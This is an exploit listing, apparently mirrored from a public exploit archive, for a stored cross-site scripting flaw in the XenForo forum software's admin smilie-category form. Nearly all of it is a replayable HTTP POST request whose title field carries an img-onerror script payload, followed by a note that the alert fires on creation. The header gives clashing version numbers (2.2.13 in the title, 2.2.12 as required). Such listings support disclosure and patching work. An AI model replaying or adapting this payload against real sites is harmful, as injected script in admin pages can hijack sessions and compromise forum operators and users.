Share
## https://sploitus.com/exploit?id=PACKETSTORM:173133
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS  
# Date: 2023-06-24  
# Exploit Author: Furkan Karaarslan  
# Category : Webapps  
# Vendor Homepage: https://x.com/admin.php?smilies  
# Version: 2.2.12 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE :   
  
-----------------------------------------------------------------------------  
Requests  
  
POST /admin.php?smilie-categories/0/save HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/admin.php?smilies/  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422  
Content-Length: 1038  
Origin: http://127.0.0.1  
Connection: close  
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="_xfToken"  
  
1687616851,83fd2350307156281e51b17e20fe575b  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="title"  
  
<img src=x onerror=alert(document.domain)>  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="display_order"  
  
1  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="_xfRequestUri"  
  
/admin.php?smilies/  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="_xfWithData"  
  
1  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="_xfToken"  
  
1687616849,b74724a115448b864ba2db8f89f415f5  
-----------------------------333176689514537912041638543422  
Content-Disposition: form-data; name="_xfResponseType"  
  
json  
-----------------------------333176689514537912041638543422--  
  
  
Response: After it is created, an alert comes immediately.